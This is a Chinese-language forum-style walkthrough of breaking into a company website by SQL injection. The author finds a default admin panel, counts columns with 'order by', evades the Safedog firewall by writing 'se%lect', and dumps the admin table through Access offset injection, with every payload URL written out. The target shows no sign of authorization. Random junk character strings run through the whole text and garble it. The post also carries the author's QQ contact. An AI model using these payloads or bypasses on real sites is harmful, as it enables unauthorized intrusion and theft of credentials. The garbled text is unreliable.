打开网站,一个企业站。
" ^" U: \. \9 \* @* O ^# ]/ {" d7 o" m( v9 F; E% V
" a2 ?* w' o7 V顺手加个admin `, m, ?/ t+ R
) O) |2 F3 I* N q' N
' W$ P e! H( Y+ Z
默认后台。
8 [3 @+ m% \) J6 l回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。) _. D( f# c3 H6 @$ }- e* I" P: n9 p
. |7 \% r; k- K: v U, G- N3 g+ P( @$ w% L7 r
2 k$ N. } w6 f4 `$ H所以就不用御剑扫了,待会直接封IP。% r' S$ P9 H9 ]! @. r( ~. H6 u) W. |
: r/ z E1 s& p& P- G* G用order by语句判断是否存在注入。# ?+ Z2 B) u6 s. z7 A
http://www.xxx.com /product_show.asp?id=997 order by 1: x3 h% y0 @7 r# N8 p
http://www.xxx.com /product_show.asp?id=997 order by 1008 z& w6 f1 x3 e6 i) B7 c v5 F
现在存在注入,经测试后发现是9个字段。" W" G8 `. P* i" {, S
4 b: B# @& v$ s6 O. P! `接下来进行联合查询,猜是否存在admin表。0 R( _) n; U2 `2 N
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
2 k2 Z9 N" [ @( |+ [' `
+ u: N, L( r; T; M( t7 U
6 h/ F g: W; e/ g- H/ d9 g' a0 l1 O' s0 C6 E
在select中间加个%,se%lect绕过安全狗。
2 c$ q3 H* t9 v/ m' g
% @- z& l" P3 a4 y+ B4 O1 a5 Z2 T0 M! X+ N- ?% m
发现存在admin表,然后开始手工猜常用的字段。
" t/ |+ {- L! U纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。: Y( [* o4 o$ _' k
( x4 I X' G" @. j突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。- G% L0 x3 [- k% `: P& U
' d0 r4 Q+ t1 O
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
) g+ g6 w9 s& h [8 K7 K7 J6 zhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
9 [0 H8 D# g- R% ?" _) \好了,敏感内容出显了。
, q, u! G# _. O6 D$ L# O8 l! l2 _1 K- K/ j
/ h( e3 x2 z5 t: E+ @4 m' a
' r8 ?' ?+ s) x |